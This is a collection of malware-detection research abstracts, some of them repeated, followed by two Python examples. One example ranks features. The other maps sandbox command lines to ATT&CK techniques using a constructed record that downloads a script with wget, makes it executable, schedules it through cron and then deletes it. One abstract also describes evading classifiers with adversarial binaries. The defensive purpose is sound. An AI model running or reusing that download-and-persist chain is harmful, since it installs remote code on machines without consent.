The proliferation of Internet of Things (IoT) devices has established edge computing as a critical paradigm for real-time data analysis and low-latency processing. Nevertheless, the distributed nature of edge computing presents substantial security challenges, rendering it a prominent target for sophisticated malware attacks. Existing signature-based and behavior-based detection methods are ineffective against the swiftly evolving nature of malware threats and are constrained by the availability of resources. This paper suggests the Genetic Encoding for Novel Optimization of Malware Evaluation (GENOME) framework, a novel solution that is intended to improve the performance of malware detection and classification in peripheral computing environments. GENOME optimizes data storage and computational efficiency by converting malware artifacts into compact, structured sequences through a Deoxyribonucleic Acid (DNA) encoding mechanism. The framework employs two DNA encoding algorithms, standard and compressed, which substantially reduce data size while preserving high detection accuracy. The Edge-IIoTset dataset was used to conduct experiments that showed that GENOME was able to achieve high classification performance using models such as Random Forest and Logistic Regression, resulting in a reduction of data size by up to 42%. Further evaluations with the CIC-IoT-23 dataset and Deep Learning models confirmed GENOME's scalability and adaptability across diverse datasets and algorithms. The potential of GENOME to address critical challenges, such as the rapid mutation of malware, real-time processing demands, and resource limitations, is emphasized in this study. GENOME offers comprehensive protection for peripheral computing environments by offering a security solution that is both efficient and scalable.
With the proliferation of Android malware, the issue of traceability in malware analysis has emerged as a significant problem that requires exploration. By establishing links between newly discovered, unreported malware and prior knowledge from existing malware data pools, security analysts can gain a better understanding of the evolution process of malware and its underlying reasons. However, in real-world scenarios, analyzing the traceability of malware can be complex and time-consuming due to the large volume of existing malware data, requiring extensive manual analysis. Furthermore, the results obtained from such analysis often lack explanation. Therefore, there is a pressing need to develop a comprehensive automated malware tracking system that can provide detailed insights into the tracking and evolution process of malware and offer strong explanatory capabilities. In this paper, we propose a knowledge graph-based approach that uses partial API call graphs comprising semantic and behavioral features to reveal the traceability relations among malware and provide explainable results for these relations. Our approach is implemented on a dataset of over 20,000 malware samples labeled with family information, spanning a time period of 10 years. To address the challenges associated with the complexity of analysis, we leverage prior knowledge from existing malware research and a branch pruning method on call graphs to reduce computational complexity and enhance the precision of explanations when determining traceability relations.
In recent years, cyber threats have escalated across diverse sectors, with cybercrime syndicates increasingly exploiting system vulnerabilities. Traditional passive defense mechanisms have proven insufficient, particularly as Linux platforms—historically overlooked in favor of Windows—have emerged as frequent targets. According to Trend Micro, there has been a substantial increase in Linux-targeted malware, with ransomware attacks on Linux surpassing those on macOS. This alarming trend underscores the need for detection strategies specifically designed for Linux environments. To address this challenge, this study proposes a comprehensive malware detection framework tailored for Linux systems, integrating dynamic behavioral analysis with the semantic reasoning capabilities of large language models (LLMs). Malware samples are executed within sandbox environments to extract behavioral features such as system calls and command-line executions. These features are then systematically mapped to the MITRE ATT&CK framework, incorporating its defined data sources, data components, and Tactics, Techniques, and Procedures (TTPs). Two mapping constructs—Conceptual Definition Mapping and TTP Technical Keyword Mapping—are developed from official MITRE documentation. These resources are utilized to fine-tune an LLM, enabling it to semantically interpret complex behavioral patterns and infer associated attack techniques, including those employed by previously unknown malware variants. The resulting detection pipeline effectively bridges raw behavioral data with structured threat intelligence. Experimental evaluations confirm the efficacy of the proposed system, with the fine-tuned Gemma 2B model demonstrating significantly enhanced accuracy in associating behavioral features with ATT&CK-defined techniques. This study contributes a fully integrated Linux-specific detection framework, a novel approach for transforming unstructured behavioral data into actionable intelligence, improved interpretability of malicious behavior, and a scalable training process for future applications of LLMs in cybersecurity.
Safeguarding against malware requires precise machine-learning algorithms to classify harmful apps. The Drebin dataset of 15,036 samples and 215 features yielded significant and reliable results for two hybrid models, CNN+XGBoost and KNN+XGBoost. To address the class imbalance issue, SMOTE (Synthetic Minority Oversampling Technique) was used to preprocess the dataset, creating synthetic samples of the minority class (malware) to balance the training set. XGBoost was then used to choose the most essential features for separating malware from benign programs. The models were trained and tested using 6-fold cross-validation, measuring accuracy, precision, recall, F1 score, and ROC AUC. The results are highly dependable, showing that CNN+XGBoost consistently outperforms KNN+XGBoost with an average accuracy of 98.76% compared to 97.89%. The CNN-based malware classification model, with its higher precision, recall, and F1 scores, is a secure choice. CNN+XGBoost, with its fewer all-fold misclassifications in confusion matrices, further solidifies this security. The calibration curve research, confirming the accuracy and cybersecurity applicability of the models' probability projections, adds to the sense of reliability. This study unequivocally demonstrates that CNN+XGBoost is a reliable and effective malware detection system, underlining the importance of feature selection and hybrid models.
Malware continues to pose a significant threat to cybersecurity, with new advanced infections that go beyond traditional detection. Limitations in existing systems include high false-positive rates, slow system response times, and inability to respond quickly to new malware forms. To overcome these challenges, this paper proposes OMD-RAS: Implementing Malware Detection in an Optimized Way through Real-Time and Adaptive Security as an extensive approach, hoping to get good results towards better malware threat detection and remediation. The significant steps in the model are data collection followed by comprehensive preprocessing consisting of feature engineering and normalization. Static analysis, along with dynamic analysis, is done to capture the whole spectrum of malware behavior for the feature extraction process. The extracted, processed features are fed, together with a continuous learning mechanism, to an Extreme Learning Machine model for real-time detection. This OMD-RAS trains quickly and has great accuracy, providing elite, advanced real-time detection capabilities. This approach uses continuous learning to adapt to new threats—ensuring the effectiveness of detection even as strategies used by malware may change over time. The experimental results showed that OMD-RAS performs better than the traditional approaches. For instance, the OMD-RAS model has been able to achieve an accuracy of 96.23% and massively reduce the rate of false positives across all datasets while eliciting a consistently high rate of precision and recall. The model's adaptive learning reflected enhancements on other performance measures, for example, Matthews Correlation Coefficients and Log Loss.
Over the past few years, malware attacks have become more and more widespread, posing threats to digital assets throughout the world. Although numerous methods have been developed to detect malicious attacks, these malware detection techniques need to be more efficient in detecting new and progressively sophisticated variants of malware. Therefore, the development of more advanced and accurate techniques is necessary for malware detection. This paper introduces a comprehensive Dual-Channel Attention Deep Bidirectional Long Short-Term Memory (DCADBiLSTM) model for malware detection and risk mitigation. The Dual Channel Attention (DCA) mechanism improves the model's capability to concentrate on the features that are most appropriate in the input data, which reduces the false favourable rates. The Bidirectional Long Short-Term Memory framework helps capture crucial interdependence from past and future circumstances, which is essential for enhancing the model's understanding of malware behaviour. As soon as malware is detected, the risk mitigation phase is implemented, which evaluates the severity of each threat and helps mitigate threats earlier. The outcomes of the method demonstrate better accuracy of 98.96%, which outperforms traditional models. It indicates the method detects and mitigates several kinds of malware threats, thereby providing a proactive defence mechanism against the emerging challenges in cybersecurity.
In the current digital era, new technologies are becoming an essential part of our lives. Consequently, the number of malicious software or malware attacks is rapidly growing. There is no doubt that the majority of malware attacks can be detected by most antivirus programs. However, such types of antivirus programs are one step behind malicious software. Due to these dilemmas, deep learning has become popular in the detection and classification of malicious data. Therefore, researchers have significantly focused on finding solutions for malware attacks by analyzing malicious samples with the help of different techniques and models. In this research, we presented a lightweight attention-based novel deep Convolutional Neural Network (DNN-CNN) model for binary and multi-class malware classification, including benign, trojan horse, ransomware, and spyware. We applied the Principal Component Analysis (PCA) technique for feature extraction for binary classification. We used the Synthetic Minority Oversampling Technique (SMOTE) to handle the imbalanced data during multi-class classification. Our proposed attention-based malware detection model is trained on the benchmark malware memory dataset named CIC-MalMem-2022. The results indicate that our model obtained high accuracy for binary and multi-class classification, 99.5% and 97.9%, respectively.
The rapid evolution of malware presents a critical cybersecurity challenge, rendering traditional signature-based detection methods ineffective against novel variants. This growing threat affects individuals, organizations, and governments, highlighting the urgent need for robust malware detection mechanisms. Conventional machine learning-based approaches rely on static and dynamic malware analysis and often struggle to detect previously unseen threats due to their dependency on predefined signatures. Although machine learning algorithms (MLAs) offer promising detection capabilities, their reliance on extensive feature engineering limits real-time applicability. Deep learning techniques mitigate this issue by automating feature extraction but may introduce computational overhead, affecting deployment efficiency. This research evaluates classical MLAs and deep learning models to enhance malware detection performance across diverse datasets. The proposed approach integrates a novel text- and image-based detection framework, employing an optimized Support Vector Machine (SVM) for textual data analysis and EfficientNet-B0 for image-based malware classification. Experimental analysis, conducted across multiple train-test splits over varying timescales, demonstrates 99.97% accuracy on textual datasets using SVM and 96.7% accuracy on image-based datasets with EfficientNet-B0, significantly improving zero-day malware detection. Furthermore, a comparative analysis with existing competitive techniques, such as Random Forest, XGBoost, and CNN-based (Convolutional Neural Network) classifiers, highlights the superior performance of the proposed model in terms of accuracy, efficiency, and robustness.
The growing complexity of cyber threats requires innovative machine learning techniques, and image-based malware classification opens up new possibilities. Meanwhile, existing research has largely overlooked the impact of noise and obfuscation techniques commonly employed by malware authors to evade detection, and there is a critical gap in using noise simulation as a means of replicating real-world malware obfuscation techniques and adopting a denoising framework to counteract these challenges. This study introduces an image denoising technique based on a U-Net combined with a GAN framework to address noise interference and obfuscation challenges in image-based malware analysis. The proposed methodology addresses existing classification limitations by introducing noise addition, which simulates obfuscated malware, and denoising strategies to restore robust image representations. To evaluate the approach, we used multiple CNN-based classifiers to assess noise resistance across architectures and datasets, measuring significant performance variation. Our denoising technique demonstrates remarkable performance improvements across two multi-class public datasets, MALIMG and BIG-15. For example, the MALIMG classification accuracy improved from 23.73% to 88.84% with denoising applied after Gaussian noise injection, demonstrating robustness. This approach contributes to improving malware detection by offering a robust framework for noise-resilient classification in noisy conditions.
The growing threat of malware, particularly in the Portable Executable (PE) format, demands more effective methods for detection and classification. Machine learning-based approaches exhibit their potential but often neglect semantic segmentation of malware files that can improve classification performance. This research applies deep learning to malware detection, using Convolutional Neural Network (CNN) architectures adapted to work with semantically extracted data to classify malware into malware families. Starting from the Malconv model, this study introduces modifications to adapt it to multi-classification tasks and improve its performance. It proposes a new innovative method that focuses on byte extraction from Portable Executable (PE) malware files based on their semantic location, resulting in higher accuracy in malware classification than traditional methods using full-byte sequences. This novel approach evaluates the importance of each semantic segment to improve classification accuracy. The results revealed that the header segment of PE files provides the most valuable information for malware identification, outperforming the other sections, and achieving an average classification accuracy of 99.54%. The above reaffirms the effectiveness of the semantic segmentation approach and highlights the critical role header data plays in improving malware detection and classification accuracy.
Detecting cyber attacks in networks connected to the Internet of Things (IoT) is of utmost importance because of the growing vulnerabilities in the smart environment. Conventional models, such as Naive Bayes and support vector machine (SVM), as well as ensemble methods, such as Gradient Boosting and eXtreme gradient boosting (XGBoost), are often plagued by high computational costs, which makes it challenging for them to perform real-time detection. In this regard, we suggested an attack detection approach that integrates Visual Geometry Group 16 (VGG16), Artificial Rabbits Optimizer (ARO), and a Random Forest model to increase detection accuracy and operational efficiency in Internet of Things (IoT) networks. In the suggested model, the extraction of features from malware pictures was accomplished with the help of VGG16. The prediction process is carried out by the random forest model using the features extracted by VGG16. Additionally, ARO is used to improve the hyper-parameters of the random forest model. With an accuracy of 96.36%, the suggested model outperforms the standard models in terms of accuracy, F1-score, precision, and recall. The comparative research highlights our strategy's success, which improves performance while maintaining a lower computational cost. This method is effective and, owing to its lower computational cost, well suited to real-time applications.
The analysis of Android malware shows that this threat is constantly increasing and is a real threat to mobile devices since traditional approaches, such as signature-based detection, are no longer effective due to the continuously advancing level of sophistication. To resolve this problem, efficient and flexible malware detection tools are needed. This work examines the possibility of employing deep CNNs to detect Android malware by transforming network traffic into image data representations. Moreover, the dataset used in this study is the CIC-AndMal2017, which contains 20,000 instances of network traffic across five distinct malware categories: a. Trojan, b. Adware, c. Ransomware, d. Spyware, e. Worm. These network traffic features are then converted to image formats for deep learning, which is applied in a CNN framework, including the VGG16 pre-trained model. In addition, our approach yielded high performance, with an accuracy of 0.92, accuracy of 99.1%, precision of 98.2%, recall of 99.5%, and F1 score of 98.7%. Subsequent improvements to the classification model through changes within the VGG19 framework improved the classification rate to 99.25%. Through the results obtained, it is clear that CNNs are a very effective way to classify Android malware, providing greater accuracy than conventional techniques. The success of this approach also shows the applicability of deep learning in mobile security along with the direction for the future advancement of the real-time detection system and other deeper learning techniques to counter the increasing number of threats emerging in the future.
In today's digital world, the Internet of Things (IoT) plays an important role in both local and global economies due to its widespread adoption in different applications. This technology has the potential to offer several advantages over conventional technologies in the near future. However, the potential growth of this technology also attracts attention from hackers, which introduces new challenges for the research community that range from hardware and software security to user privacy and authentication. Therefore, we focus on a particular security concern that is associated with malware detection. The literature presents many countermeasures, but inconsistent results on identical datasets and algorithms raise concerns about model biases, training quality, and complexity. This highlights the need for an adaptive, real-time learning framework that can effectively mitigate malware threats in IoT applications. To address these challenges, (i) we propose an intelligent framework based on Two-step Deep Reinforcement Learning (TwStDRL) that is capable of learning and adapting in real-time to counter malware threats in IoT applications. This framework uses exploration and exploitation phenomena during both the training and testing phases by storing results in a replay memory. The stored knowledge allows the model to effectively navigate the environment and maximize cumulative rewards. (ii) To demonstrate the superiority of the TwStDRL framework, we implement and evaluate several machine learning algorithms for comparative analysis that include Support Vector Machines (SVM), Multi-Layer Perceptron, Random Forests, and k-means Clustering. The selection of these algorithms is driven by the inconsistent results reported in the literature, which create doubt about their robustness and reliability in real-world IoT deployments. (iii) Finally, we provide a comprehensive evaluation to justify why the TwStDRL framework outperforms them in mitigating security threats. During analysis, we noted that our proposed TwStDRL scheme achieves an average performance of 99.45% across accuracy, precision, recall, and F1-score, which is an absolute improvement of roughly 3% over the existing malware-detection models.
The dominance of Android in the global mobile market and the open development characteristics of this platform have resulted in a significant increase in malware. These malicious applications have become a serious concern to the security of Android systems. To address this problem, researchers have proposed several machine-learning models to detect and classify Android malware based on analyzing features extracted from Android samples. However, most existing studies have focused on the classification task and overlooked the feature selection process, which is crucial to reduce the training time and maintain or improve the classification results. The current paper proposes a new Android malware detection and classification approach that identifies the most important features to improve classification performance and reduce training time. The proposed approach consists of two main steps. First, a feature selection method based on the Attention mechanism is used to select the most important features. Then, an optimized Light Gradient Boosting Machine (LightGBM) classifier is applied to classify the Android samples and identify the malware. The feature selection method proposed in this paper is to integrate an Attention layer into a multilayer perceptron neural network. The role of the Attention layer is to compute the weighted values of each feature based on its importance for the classification process. Experimental evaluation of the approach has shown that combining the Attention-based technique with an optimized classification algorithm for Android malware detection has improved the accuracy from 98.64% to 98.71% while reducing the training time from 80 to 28 s.
Detecting malware on mobile devices using the Android operating system has become a critical challenge in the field of cybersecurity, in the context of the rapid increase in the number of malware variants and the frequency of attacks targeting Android devices. In this paper, we propose a novel intelligent computational method to enhance the effectiveness of Android malware detection models. The proposed method combines two main techniques: (1) constructing a malware behavior profile and (2) extracting features from the malware behavior profile using graph neural networks. Specifically, to effectively construct an Android malware behavior profile, this paper proposes an information enrichment technique for the function call graph of malware files, based on new graph-structured features and semantic features of the malware's source code. Additionally, to extract significant features from the constructed behavior profile, the study proposes using the GraphSAGE graph neural network. With this novel intelligent computational method, a variety of significant features of the malware have been effectively represented, synthesized, and extracted. The approach to detecting Android malware proposed in this paper is a new study and has not been explored in previous research. The experimental results on a dataset of 40,819 Android software samples indicate that the proposed method performs well across all metrics, with particularly impressive accuracy and recall scores of 99.03% and 99.19%, respectively, which outperforms existing state-of-the-art methods.
The widespread adoption of Internet of Things (IoT) devices has resulted in notable progress in different fields, improving operational effectiveness while also raising concerns about privacy due to their vulnerability to virus attacks. Further, the study suggests using an advanced approach that utilizes machine learning, specifically the Wide Residual Network (WRN), to identify hidden malware in IoT systems. The research intends to improve privacy protection by accurately identifying malicious software that undermines the security of IoT devices, using the MalMemAnalysis dataset. Moreover, thorough experimentation provides evidence for the effectiveness of the WRN-based strategy, resulting in exceptional performance measures such as accuracy, precision, F1-score, and recall. The study of the test data demonstrates highly impressive results, with a multiclass accuracy surpassing 99.97% and a binary class accuracy beyond 99.98%. The results emphasize the strength and dependability of using advanced deep learning methods such as WRN for identifying hidden malware risks in IoT environments. Furthermore, a comparison examination with the current body of literature emphasizes the originality and efficacy of the suggested methodology. This research builds upon previous studies that have investigated several machine learning methods for detecting malware on IoT devices. However, it distinguishes itself by showcasing exceptional performance metrics and validating its findings through thorough experimentation with real-world datasets. Utilizing WRN offers benefits in managing the intricacies of malware detection, emphasizing its capacity to enhance the security of IoT ecosystems. To summarize, this work proposes an effective way to address privacy concerns on IoT devices by utilizing advanced machine learning methods. The research provides useful insights into the changing landscape of IoT cybersecurity by emphasizing methodological rigor and conducting comparative performance analysis. Future research could focus on enhancing the recommended approach by adding more datasets and leveraging real-time monitoring capabilities to strengthen IoT devices' defenses against new cybersecurity threats.
Despite only being around for a few years, mobile devices have steadily risen to become the most extensively used computer devices. Given the number of people who rely on smartphones, which can install third-party apps, it has become an increasingly important issue for end-users and service providers to ensure that both the devices and the underlying network are secure. People will become more reliant on applications such as SMS, MMS, Internet Access, Online Transactions, and so on due to such features and capabilities. Thousands of devices ranging from low-cost phones to high-end luxury phones are powered by the Android operating system, which has dominated the smartphone marketplace. It is about making it possible for people from all socioeconomic backgrounds to get and use mobile devices in their daily activities. In response to this growing popularity, the number of new applications introduced to the Android market has skyrocketed. The recent appearance of a wide range of mobile malware has caught the attention of security professionals and scholars alike. In light of the ongoing expansion of the mobile phone industry, the likelihood of it being used in criminal activities will only continue to rise in the future. This article reviews the literature on malware detection and prevention in Android mobile devices, analyzes the existing literature on major studies and tasks, and covers articles, journals, and digital resources such as Internet security publications, scientific studies, and conferences.
Abstract: The growing usage of Android smartphones has led to a significant rise in incidents of Android malware and privacy breaches. This escalating security concern necessitates the development of advanced technologies capable of automatically detecting and mitigating malicious activities in Android applications (apps). Such technologies are crucial for safeguarding user data and maintaining the integrity of mobile devices in an increasingly digital world. Current methods employed to detect sensitive data leaks in Android apps are hampered by two major limitations: they require substantial computational resources and are prone to a high frequency of false positives. That is, while attempting to identify security breaches, these methods often consume considerable processing power and mistakenly flag benign activities as malicious, leading to inefficiencies and reduced reliability in malware detection. The proposed approach includes a data preprocessing step that removes duplicate samples, manages unbalanced datasets, corrects inconsistencies and imputes missing values to ensure data accuracy. Min-max normalization is then applied to the numerical data, followed by feature vector extraction using the Gain Ratio and the Chi-squared test to identify and extract the most significant characteristics for an appropriate prediction model. This study focuses on extracting the subset of attributes best suited to the task and recommending a predictive model based on domain expert opinion. The proposed method is evaluated using the Drebin and TUANDROMD datasets, containing 15,036 and 4,464 benign and malicious samples, respectively. The empirical results show that the Random Forest (RF) and Support Vector Machine (SVM) classifiers achieved accuracy rates of 98.9% and 98.8%, respectively, in detecting unknown Android malware. A sensitivity analysis was also carried out on all three ML-based classifiers using MAE, MSE, R2 and sensitivity parameters, resulting in flawless performance for both datasets. This approach has substantial potential for real-world applications and can serve as a valuable tool for preventing the spread of Android malware and enhancing mobile device security.
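The Gain Ratio and Chi-squared feature-ranking step described in the abstract above, together with the min-max normalization, as an added worked example (not code from the paper): the feature names, the eight-row dataset and the numeric column are constructed for illustration, and the scoring functions are the standard definitions rather than the paper's implementation.

```python
import math
from collections import Counter

# Constructed toy dataset: one row per Android app with binary permission/API flags of the kind found
# in Drebin-style feature vectors, a numeric column, and a label. Values are invented for illustration.
FEATURES = ["SEND_SMS", "READ_CONTACTS", "INTERNET"]
ROWS = [  # (SEND_SMS, READ_CONTACTS, INTERNET, apk_size_kb, label)
    (1, 1, 1, 100, "malware"), (1, 1, 1, 250, "malware"), (1, 1, 1, 400, "malware"), (1, 0, 1, 700, "malware"),
    (0, 0, 1, 120, "benign"), (0, 1, 1, 300, "benign"), (0, 0, 1, 450, "benign"), (0, 0, 1, 650, "benign"),
]
LABELS = [r[-1] for r in ROWS]


def entropy(values) -> float:
    """Shannon entropy in bits of a discrete sequence."""
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values()) if n else 0.0


def info_gain(column, labels) -> float:
    """H(Y) - H(Y | feature): how much knowing the feature reduces label uncertainty."""
    n = len(labels)
    conditional = 0.0
    for v in set(column):
        subset = [y for x, y in zip(column, labels) if x == v]
        conditional += len(subset) / n * entropy(subset)
    return entropy(labels) - conditional


def gain_ratio(column, labels) -> float:
    """Information gain normalized by the feature's own entropy (split information), so that
    many-valued features are not favoured; a constant feature has no split and scores 0."""
    split_information = entropy(column)
    return info_gain(column, labels) / split_information if split_information > 0 else 0.0


def chi_square(column, labels) -> float:
    """Pearson chi-squared statistic of the feature/label contingency table (larger = more dependent)."""
    n = len(labels)
    col_counts, lab_counts, joint = Counter(column), Counter(labels), Counter(zip(column, labels))
    stat = 0.0
    for v in col_counts:
        for y in lab_counts:
            expected = col_counts[v] * lab_counts[y] / n
            stat += (joint[(v, y)] - expected) ** 2 / expected
    return stat


def min_max(column) -> list:
    """Min-max normalization to [0, 1]; a constant column maps to 0.0 instead of dividing by zero."""
    lo, hi = min(column), max(column)
    return [0.0 if hi == lo else (x - lo) / (hi - lo) for x in column]


def rank_features(rows, names, labels) -> list:
    """Score every binary feature with both criteria and rank them, best first."""
    scored = {}
    for i, name in enumerate(names):
        column = [r[i] for r in rows]
        scored[name] = {"gain_ratio": gain_ratio(column, labels), "chi2": chi_square(column, labels)}
    return sorted(scored.items(), key=lambda kv: (kv[1]["gain_ratio"], kv[1]["chi2"]), reverse=True)
```

On this toy data `rank_features(ROWS, FEATURES, LABELS)` places SEND_SMS first (gain ratio 1.0, chi-squared 8.0, a perfect separator), READ_CONTACTS second (about 0.189 and 2.0) and INTERNET last (0 and 0: a flag every app carries tells the classifier nothing, which is exactly what the ranking is meant to discard), while `min_max` rescales the size column so that the tree and SVM models see comparable ranges.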
Abstract: With the ever-increasing adoption of Industrial Internet of Things (IoT) technologies, security concerns have grown exponentially, especially regarding the protection of critical infrastructures. This is primarily due to the potential for backdoors to provide unauthorized access, disrupt operations and compromise sensitive data. Backdoors pose a significant threat to the integrity and security of Industrial IoT setups by exploiting vulnerabilities and bypassing standard authentication processes; hence their detection is of paramount importance. This paper investigates the capabilities of Machine Learning (ML) models in identifying backdoor malware and also evaluates the effect on model performance of balancing the dataset via resampling techniques, including the Synthetic Minority Oversampling Technique (SMOTE), the Synthetic Data Vault (SDV) and the Conditional Tabular Generative Adversarial Network (CTGAN), and of feature reduction using the Pearson correlation coefficient. Experimental evaluation on the CCCS-CIC-AndMal-2020 dataset shows that the Random Forest (RF) classifier produced the best model, with 99.98% accuracy, when trained on a balanced dataset created by SMOTE. Additionally, training and testing time was reduced by approximately 50% when switching from the full feature set to the reduced feature set, without significant performance loss.
Abstract: Antivirus vendors and the research community employ Machine Learning (ML) or Deep Learning (DL) based static analysis techniques for the efficient identification of new threats, given the continual emergence of novel malware variants. On the other hand, numerous researchers have reported that Adversarial Examples (AEs), generated by manipulating previously detected malware, can successfully evade ML/DL-based classifiers. Commercial antivirus systems in particular have been identified as vulnerable to such AEs. This paper first conducts black-box attacks to circumvent ML/DL-based malware classifiers. The attack method uses seven different perturbations, including Overlay Append, Section Append and Break Checksum, which capitalize on the ambiguities of the PE format and have been employed in earlier evasion attack research. By applying the perturbations directly to PE binaries, the attack avoids the problem-space/feature-space dilemma, a persistent challenge in many evasion attack studies. Being a black-box attack, the method can generate AEs that evade both DL-based and ML-based classifiers. AEs generated by the method also retain their executability and malicious behavior, eliminating the need for functionality verification. Through thorough evaluation, we confirmed that the attack method achieves an evasion rate of 65.6% against well-known ML-based malware detectors and up to 99% against well-known DL-based malware detectors. Furthermore, our AEs bypassed detection by 17% of the 64 vendors on VirusTotal (VT). In addition, we propose a defensive approach that uses the Trend Micro Locality Sensitive Hash (TLSH) to construct a similarity-based defense model. Through several experiments, we verified that the defense model can effectively counter AEs generated by the perturbation techniques. In conclusion, the defense model alleviates the limitation of the most promising existing defense, adversarial training, which is only effective against AEs that were included when training the classifiers.
Funding: supported by the Institute of Information & Communications Technology Planning & Evaluation (IITP) (Project Nos. RS-2024-00438551, 30%; 2022-11220701, 30%; 2021-0-01816, 30%) and the National Research Foundation of Korea (NRF) grant funded by the Korean Government (Project No. RS2023-00208460, 10%).
Abstract: With the proliferation of Android malware, the issue of traceability in malware analysis has emerged as a significant problem that requires exploration. By establishing links between newly discovered, unreported malware and prior knowledge from existing malware data pools, security analysts can gain a better understanding of the evolution of malware and its underlying causes. However, in real-world scenarios, analyzing the traceability of malware can be complex and time-consuming due to the large volume of existing malware data, which requires extensive manual analysis. Furthermore, the results obtained from such analysis often lack explanation. Therefore, there is a pressing need for a comprehensive automated malware tracking system that can provide detailed insights into the tracking and evolution of malware and offer strong explanatory capabilities. In this paper, we propose a knowledge graph-based approach that uses partial API call graphs comprising semantic and behavioral features to reveal the traceability relations among malware and to provide explainable results for these relations. Our approach is implemented on a dataset of over 20,000 malware samples labeled with family information and spanning a period of 10 years. To address the complexity of the analysis, we leverage prior knowledge from existing malware research and a branch pruning method on call graphs to reduce computational complexity and enhance the precision of the explanations when determining traceability relations.
Funding: supported by the National Science and Technology Council under grant number 113-2221-E-027-126-MY3.
Abstract: In recent years, cyber threats have escalated across diverse sectors, with cybercrime syndicates increasingly exploiting system vulnerabilities. Traditional passive defense mechanisms have proven insufficient, particularly as Linux platforms, historically overlooked in favor of Windows, have emerged as frequent targets. According to Trend Micro, there has been a substantial increase in Linux-targeted malware, with ransomware attacks on Linux surpassing those on macOS. This trend underscores the need for detection strategies specifically designed for Linux environments. To address this challenge, this study proposes a comprehensive malware detection framework tailored to Linux systems, integrating dynamic behavioral analysis with the semantic reasoning capabilities of large language models (LLMs). Malware samples are executed in sandbox environments to extract behavioral features such as system calls and command-line executions. These features are then systematically mapped to the MITRE ATT&CK framework, incorporating its defined data sources, data components, and Tactics, Techniques and Procedures (TTPs). Two mapping constructs, Conceptual Definition Mapping and TTP Technical Keyword Mapping, are developed from official MITRE documentation. These resources are used to fine-tune an LLM, enabling it to semantically interpret complex behavioral patterns and infer the associated attack techniques, including those employed by previously unknown malware variants. The resulting detection pipeline bridges raw behavioral data and structured threat intelligence. Experimental evaluation confirms the efficacy of the proposed system, with the fine-tuned Gemma 2B model demonstrating significantly enhanced accuracy in associating behavioral features with ATT&CK-defined techniques. This study contributes a fully integrated Linux-specific detection framework, a novel approach for transforming unstructured behavioral data into actionable intelligence, improved interpretability of malicious behavior, and a scalable training process for future applications of LLMs in cybersecurity.
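The TTP Technical Keyword Mapping step of the abstract above, as an added example that is not the paper's own code or mapping table: sandbox records (command lines plus system call names) are mapped to ATT&CK technique IDs and data components by keyword rules, producing the structured, evidence-backed representation that the LLM stage would then be trained on. The technique IDs, names and data components are real ATT&CK entries; the keyword patterns, the record format and the two sample records (including the TEST-NET address 198.51.100.7) are assumptions constructed for this example.

```python
import re
from collections import Counter, defaultdict

# Hypothetical TTP keyword-mapping table (an assumption for this example). The technique IDs, names
# and data components are real ATT&CK entries; the keyword patterns are the example's own choice.
RULES = [
    ("T1059.004", "Command and Scripting Interpreter: Unix Shell", "Command Execution",
     re.compile(r"(?:^|/)(?:ba|da|z)?sh\s+-c\b")),
    ("T1105", "Ingress Tool Transfer", "Network Connection Creation",
     re.compile(r"\b(?:curl|wget)\b.*https?://")),
    ("T1222.002", "File and Directory Permissions Modification: Linux and Mac File and Directory "
                  "Permissions Modification", "File Metadata", re.compile(r"\bchmod\s+[+0-7]")),
    ("T1053.003", "Scheduled Task/Job: Cron", "Scheduled Job Creation",
     re.compile(r"\bcrontab\s+(?:-|\S+\.cron)(?:\s|$)|/etc/cron\.\w+|/var/spool/cron")),
    ("T1070.004", "Indicator Removal: File Deletion", "File Deletion", re.compile(r"\brm\s")),
    ("T1543.002", "Create or Modify System Process: Systemd Service", "Service Creation",
     re.compile(r"\bsystemctl\s+(?:enable|start)\b|/etc/systemd/system/")),
    ("T1497.001", "Virtualization/Sandbox Evasion: System Checks", "Command Execution",
     re.compile(r"/proc/cpuinfo|\bdmidecode\b|/sys/class/dmi")),
]
SYSCALL_RULES = {"T1070.004": {"unlink", "unlinkat"}}   # syscall-level evidence for the same technique
META = {tid: (name, component) for tid, name, component, _ in RULES}


def map_sample(record: dict) -> list:
    """Map one sandbox record (command lines + syscall names) to ATT&CK techniques with evidence."""
    hits = defaultdict(list)
    for cmd in record["cmdlines"]:
        for tid, _, _, pattern in RULES:
            if pattern.search(cmd):
                hits[tid].append("cmd: " + cmd)
    for name in record["syscalls"]:
        for tid, wanted in SYSCALL_RULES.items():
            if name in wanted:
                hits[tid].append("syscall: " + name)
    return [{"technique": tid, "name": META[tid][0], "data_component": META[tid][1], "evidence": ev}
            for tid, ev in sorted(hits.items())]


def technique_profile(records: list) -> Counter:
    """How many samples exhibit each technique: the structured view handed to the LLM stage."""
    return Counter(h["technique"] for r in records for h in map_sample(r))


# Constructed sandbox records in the shape this example assumes (not real sandbox output).
SAMPLES = [
    {"id": "sample-A", "syscalls": ["execve", "connect", "unlinkat"],
     "cmdlines": ["/bin/sh -c 'wget http://198.51.100.7/x.sh -O /tmp/x.sh'",
                  "chmod +x /tmp/x.sh",
                  "(crontab -l; echo '* * * * * /tmp/x.sh') | crontab -",
                  "rm -f /tmp/x.sh"]},
    {"id": "sample-B", "syscalls": ["execve", "read"],
     "cmdlines": ["ls -la /home", "cat /etc/hostname"]},
]
```

`map_sample(SAMPLES[0])` yields five techniques (cron persistence, shell execution, file deletion, tool download and permission change), with file deletion supported by both the `rm` command line and the `unlinkat` syscall, while the benign record maps to nothing; keeping the evidence strings alongside each technique is what makes the later inference explainable rather than a bare label.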
Abstract: Safeguarding against malware requires precise machine-learning algorithms to classify harmful apps. The Drebin dataset of 15,036 samples and 215 features yielded significant and reliable results for two hybrid models, CNN+XGBoost and KNN+XGBoost. To address class imbalance, SMOTE (Synthetic Minority Oversampling Technique) was used to preprocess the dataset, creating synthetic samples of the minority class (malware) to balance the training set. XGBoost was then used to choose the features most useful for separating malware from benign programs. The models were trained and tested using 6-fold cross-validation, measuring accuracy, precision, recall, F1 score and ROC AUC. The results show that CNN+XGBoost consistently outperforms KNN+XGBoost, with an average accuracy of 98.76% compared to 97.89%. The CNN-based malware classification model, with its higher precision, recall and F1 scores, is the safer choice, and its fewer misclassifications across all folds in the confusion matrices further support this. A calibration curve analysis confirms the accuracy of the models' probability estimates and their applicability in cybersecurity. This study demonstrates that CNN+XGBoost is a reliable and effective malware detection system and underlines the importance of feature selection and hybrid models.
Funding: supported by a grant from the Center of Excellence in Information Assurance (CoEIA), King Saud University (KSU).
